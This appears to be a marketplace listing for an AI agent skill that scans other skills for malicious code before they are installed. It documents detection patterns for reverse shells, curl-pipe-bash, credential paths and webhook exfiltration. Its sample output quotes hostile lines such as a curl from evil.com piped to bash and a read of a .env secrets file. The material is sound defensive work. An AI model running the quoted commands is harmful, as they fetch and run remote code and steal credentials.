← 返回 Skills 市场
1696
总下载
1
收藏
6
当前安装
1
版本数
在 OpenClaw 中安装
/install clawhub-skill-scanner
功能描述
Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.
使用说明 (SKILL.md)
Skill Security Audit
MANDATORY security check before installing external skills.
Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.
When to Use
Run this audit BEFORE any skill installation:
clawhub install \x3Cskill>- Manual skill download/copy
- Skills from GitHub, URLs, or untrusted sources
Quick Start
# Scan a skill folder
python3 scripts/scan_skill.py /path/to/skill
# JSON output for automation
python3 scripts/scan_skill.py /path/to/skill --json
# Exit code 0 only if SAFE
python3 scripts/scan_skill.py /path/to/skill --install-if-safe
What It Detects
🔴 CRITICAL (Blocks Installation)
| Category | Patterns |
|---|---|
| Reverse Shells | nc -e, bash /dev/tcp, Python socket shells |
| Curl-Pipe-Bash | curl | bash, wget && chmod +x |
| Credential Access | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
| Data Exfiltration | Discord/Slack webhooks, POST with secrets |
| Malicious Domains | glot.io, pastebin (known malware hosts) |
| Persistence | crontab, systemd, LaunchAgents, .bashrc |
| Command Injection | eval(), exec(), subprocess shell=True |
| Obfuscation | base64 decode pipes, pickle, marshal |
🟡 WARNING (Review Required)
Only patterns that are suspicious regardless of skill type:
- Raw socket usage (unusual for most skills)
- Dynamic code compilation
- File/directory deletion
- Screenshot/keyboard capture libraries
- Low-level system calls (ctypes)
Philosophy
We intentionally don't warn on common patterns like:
- HTTP requests (normal for API skills)
- API key references (normal for integration skills)
- File writes (normal for data skills)
- Environment variable access (normal for config)
This reduces noise so real threats stand out.
Risk Scoring
CRITICAL findings × 30 = Base score
WARNING findings × 3 (capped at 10) = Warning contribution
| Score | Level | Action |
|---|---|---|
| 0-20 | 🟢 SAFE | Auto-approve |
| 21-50 | 🟡 CAUTION | Review findings |
| 51-80 | 🔶 DANGER | Detailed review required |
| 81-100 | 🔴 BLOCKED | Do NOT install |
Sample Output
════════════════════════════════════════════════════════════
SKILL SECURITY AUDIT: suspicious-skill
════════════════════════════════════════════════════════════
📊 RISK SCORE: 90/100 - 🔴 BLOCKED
🔴 CRITICAL FINDINGS (3)
[install.py:15] Curl pipe to shell (DANGEROUS!)
Code: os.system('curl https://evil.com/x.sh | bash')
[setup.py:42] Discord webhook exfiltration
Code: requests.post('https://discord.com/api/webhooks/...')
[run.py:8] ClawdBot .env access (ClawHavoc target!)
Code: open(os.path.expanduser('~/.clawdbot/.env'))
📁 FILES SCANNED: 5
📏 TOTAL LINES: 230
════════════════════════════════════════════════════════════
🔴 BLOCK - Do NOT install this skill
════════════════════════════════════════════════════════════
Integration with clawhub
Create a wrapper script to auto-scan before installation:
#!/bin/bash
# clawhub-secure: Scan before install
SKILL="$2"
TEMP="/tmp/skill-audit-$$"
# Fetch without installing
clawhub inspect "$SKILL" --out "$TEMP"
# Scan
python3 /path/to/scan_skill.py "$TEMP" --install-if-safe
if [ $? -eq 0 ]; then
clawhub install "$SKILL"
else
echo "🔴 Installation blocked by security scan"
exit 1
fi
rm -rf "$TEMP"
References
See references/threat-patterns.md for detailed pattern explanations.
Credits
Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated large-scale supply chain attacks via AI agent skill marketplaces.
安全使用建议
This skill appears to do what it says: a local pattern-based scanner you can run before installing skills. Before trusting it as your only defense: 1) Verify the scanner's source (owner and repo) and ensure you obtained the package from a trusted location — the provided metadata has no homepage and an unfamiliar owner ID. 2) Inspect scripts/scan_skill.py yourself (or in a sandbox/CI) to confirm the rule set matches your threat model and to tune whitelist/blacklist rules to avoid false positives/negatives. 3) Don't rely solely on this tool: pattern-based scanners can miss obfuscated or logic-based exfiltration and can also produce false positives; combine with manual review or runtime sandboxing for high-risk skills. 4) If you plan to integrate the wrapper into an automated install pipeline, ensure the wrapper's paths are correct and run the scanner from a controlled environment (CI or isolated host) so it cannot be tricked into scanning arbitrary system paths. If you want higher assurance, request a published repository URL or signed release for provenance — absence of a homepage/repo reduces confidence.
功能分析
Type: OpenClaw Skill
Name: clawhub-skill-scanner
Version: 0.1.0
This skill bundle is a security scanner designed to detect malicious patterns in other OpenClaw skills. All files, including SKILL.md (agent instructions), scripts/scan_skill.py (core logic), and documentation, consistently describe and implement this benign functionality. The SKILL.md provides instructions on how to use the scanner to prevent malicious installations, without containing any prompt injection attempts or instructions for the agent to perform harmful actions. The Python script itself safely reads files and applies regex patterns to identify threats, without executing any detected patterns or performing unauthorized network/file system operations. There is no evidence of intentional harmful behavior or risky capabilities beyond its stated purpose as a security analysis tool.
能力评估
Purpose & Capability
Name/description claim a pre-install security scanner and the package includes a Python scanner (scripts/scan_skill.py) plus documentation implementing that purpose. It does not request unrelated credentials, binaries, or configuration paths.
Instruction Scope
SKILL.md instructs the agent/user to run the included Python scanner against a skill folder and shows a wrapper that fetches a skill and scans it before install — this matches the stated purpose. Minor concerns: the doc repeatedly calls the scan 'MANDATORY' and lists triggers (e.g., 'install skill') but the skill metadata doesn't enforce mandatory execution; the wrapper script assumes clawhub inspect is available at runtime and the path to the scanner is correct. Also review the scanner's whitelist and pattern choices (e.g., some generic whitelist entries like '# ' and 'https://api.' may suppress matches in comments or API URLs).
Install Mechanism
No install spec/external downloads; code lives in the skill bundle. This minimizes supply-chain risk since nothing is fetched or executed by an automated install step in the skill itself.
Credentials
The skill requires no environment variables, credentials, or privileged config paths. The scanner looks for references to credentials in scanned code (e.g., ~/.ssh, ~/.aws, .env) which is appropriate for its purpose.
Persistence & Privilege
Skill is not marked always:true and does not request persistent privileges. The SKILL.md suggests a wrapper to run the scanner before installs, but the skill itself does not modify other skill configs or system-wide settings.
如何使用
- 确保已安装 OpenClaw(本地或 Docker 部署)
- 在对话框中输入安装命令:
/install clawhub-skill-scanner - 安装完成后,直接呼叫该 Skill 的名称或使用
/clawhub-skill-scanner触发 - 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v0.1.0
Initial release of clawhub-skill-scanner
- Introduces a mandatory security audit tool for skill installations from ClawHub, GitHub, and external sources.
- Deep code analysis detects critical risks including reverse shells, credential access, data exfiltration, command injection, and common malware patterns.
- Outputs clear risk scoring (SAFE/CAUTION/DANGER/BLOCKED) and actionable summaries.
- Designed to minimize false alarms by ignoring common benign patterns.
- Includes CLI examples and integration guide for automated pre-install scanning.
- Created in response to ClawHavoc supply chain compromise.
元数据
常见问题
Clawhub Skill Scanner 是什么?
Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation. 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 1696 次。
如何安装 Clawhub Skill Scanner?
在 OpenClaw 或 Claude Code 对话框中运行命令「/install clawhub-skill-scanner」即可一键安装,无需额外配置。
Clawhub Skill Scanner 是免费的吗?
是的,Clawhub Skill Scanner 完全免费(开源免费),可自由下载、安装和使用。
Clawhub Skill Scanner 支持哪些平台?
Clawhub Skill Scanner 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。
谁开发了 Clawhub Skill Scanner?
由 amir-ag(@amir-ag)开发并维护,当前版本 v0.1.0。
推荐 Skills